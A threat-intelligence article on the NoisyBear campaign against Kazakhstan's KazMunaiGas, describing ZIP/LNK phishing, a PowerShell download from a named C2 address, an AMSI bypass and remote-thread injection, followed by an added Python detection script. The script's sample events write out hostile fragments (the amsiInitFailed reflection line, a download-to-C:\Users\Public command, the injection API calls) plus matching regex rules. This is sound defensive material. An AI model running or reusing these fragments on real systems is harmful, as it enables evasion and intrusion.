NoisyBear Weaponizing ZIP Files to PowerShell Loaders and Exfiltrate Sensitive Data

A sophisticated threat actor known as NoisyBear has emerged as a significant concern for Kazakhstan’s energy sector, employing advanced tactics to infiltrate critical infrastructure through weaponized ZIP files and PowerShell-based attack chains.

This newly identified group has been orchestrating targeted campaigns against KazMunaiGas (KMG), the country’s national oil and gas company, using highly crafted phishing emails that mimic legitimate internal communications about salary schedules and policy updates.

The attack methodology demonstrates remarkable precision in social engineering, with threat actors compromising legitimate business email accounts within KazMunaiGas to lend authenticity to their malicious communications.

These emails contain ZIP attachments disguised as urgent HR-related documents, creating a false sense of legitimacy that encourages employee interaction.

The campaign’s sophistication extends beyond simple phishing, incorporating multi-stage payload delivery systems that leverage trusted system binaries and PowerShell execution environments to maintain stealth throughout the infection process.

Seqrite researchers identified this threat group’s activities beginning in April 2025, with active campaigns intensifying throughout May 2025.

The researchers noted that NoisyBear’s operational patterns suggest Russian origins, evidenced by Russian language comments within malicious code, utilization of sanctioned hosting services, and targeting patterns consistent with geopolitical interests in Central Asian energy resources.

Infection Chain (Source – Seqrite)

The group’s infrastructure analysis reveals connections to Aeza Group LLC, a sanctioned hosting provider, indicating deliberate attempts to operate within jurisdictions that complicate attribution and takedown efforts.

The malware’s impact extends beyond simple data theft, incorporating advanced persistence mechanisms and defense evasion techniques that allow prolonged network access.

Victims face potential exposure of sensitive corporate communications, strategic planning documents, and operational data critical to Kazakhstan’s energy infrastructure.

The campaign’s focus on energy sector entities raises concerns about potential disruption to critical national infrastructure and economic stability.

Infection Mechanism and Technical Analysis

The NoisyBear infection chain begins with malicious ZIP files containing three critical components: a decoy document bearing the official KazMunaiGas logo, a README.txt file providing execution instructions, and a weaponized LNK file named “График зарплат.lnk” (Salary Schedule.lnk).

The malicious shortcut file employs PowerShell as a Living Off The Land Binary (LOLBIN) to execute sophisticated download operations.

Upon execution, the LNK file initiates a PowerShell command that retrieves a malicious batch script named “123.bat” from the remote server “77.239.125.41:8443”.

The downloaded script is strategically placed in the C:\Users\Public directory, a location chosen because it is writable by any user and receives reduced security scrutiny.

The batch script serves as a secondary loader, downloading PowerShell scripts dubbed “DOWNSHELL” by researchers.

These loaders demonstrate advanced Anti-Malware Scan Interface (AMSI) bypass techniques, using reflection to manipulate the System.Management.Automation.AmsiUtils class.

The malware sets the “amsiInitFailed” flag to convince PowerShell that AMSI initialization has failed, effectively disabling real-time scanning for subsequent malicious operations in that session.

The final payload involves process injection techniques targeting explorer.exe, utilizing classic CreateRemoteThread injection methods.

The malware employs OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread API calls to inject Meterpreter reverse shell capabilities, establishing persistent backdoor access for data exfiltration and remote command execution.
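The following is an added detection example, not code from the article or from Seqrite: a small triage routine that flags the stages described above (reflection against AmsiUtils/amsiInitFailed, the OpenProcess/VirtualAllocEx/WriteProcessMemory/CreateRemoteThread sequence, a LOLBIN download into C:\Users\Public, and HTTP traffic to a bare IP on port 8443) in constructed PowerShell script-block and process-creation records. The "event_id|image|text" line format, rule names and sample command text are assumptions; only the IP, port, file name and path come from the article.

```python
import re

# Constructed sample events in an assumed "event_id|image|text" format, modelled on
# Windows 4104 script-block and 4688 process-creation logs. The surrounding command
# text is made up for illustration; 77.239.125.41:8443, 123.bat and C:\Users\Public
# are the values reported in the article.
SAMPLE_EVENTS = [
    "4104|powershell.exe|[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static')",
    "4688|powershell.exe|powershell.exe -w hidden -c \"iwr http://77.239.125.41:8443/123.bat"
    " -OutFile C:\\Users\\Public\\123.bat\"",
    "4104|powershell.exe|$h=OpenProcess(0x1F0FFF,$false,$target);$a=VirtualAllocEx($h,0,$len,0x3000,0x40);"
    "WriteProcessMemory($h,$a,$buf,$len,[ref]0);CreateRemoteThread($h,0,0,$a,0,0,0)",
    "4104|powershell.exe|Get-ChildItem C:\\Users\\Public | Sort-Object LastWriteTime",  # benign admin activity
]

# Each rule is a list of regexes that must ALL match the same event text.
# Requiring the full API sequence (rather than any single call) keeps the
# injection rule from firing on ordinary P/Invoke usage.
RULES = {
    "amsi_reflection_bypass": [r"AmsiUtils", r"amsiInitFailed"],
    "remote_thread_injection": [r"\bOpenProcess\b", r"\bVirtualAllocEx\b",
                                r"\bWriteProcessMemory\b", r"\bCreateRemoteThread\b"],
    "lolbin_download_to_public": [r"\b(iwr|Invoke-WebRequest|DownloadFile|DownloadString|curl|wget)\b",
                                  r"\\Users\\Public\\"],
    "http_to_ip_port_8443": [r"https?://\d{1,3}(?:\.\d{1,3}){3}:8443\b"],
}


def parse_event(line):
    """Split one assumed-format log line into its three fields."""
    event_id, image, text = line.split("|", 2)
    return {"event_id": event_id, "image": image, "text": text}


def match_rules(text):
    """Return the names of all rules whose patterns all match the given text."""
    return [name for name, patterns in RULES.items()
            if all(re.search(p, text, re.IGNORECASE) for p in patterns)]


def triage(events):
    """Return (index, event_id, matched_rules) for every event that fires at least one rule."""
    hits = []
    for idx, line in enumerate(events):
        ev = parse_event(line)
        matched = match_rules(ev["text"])
        if matched:
            hits.append((idx, ev["event_id"], matched))
    return hits


if __name__ == "__main__":
    for idx, event_id, rules in triage(SAMPLE_EVENTS):
        print(f"event {idx} ({event_id}): {', '.join(rules)}")
```

In a real deployment the same rules would be applied to PowerShell script-block logging (Event ID 4104) and process-creation auditing with command-line capture enabled, which is what makes the first two stages visible at all.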
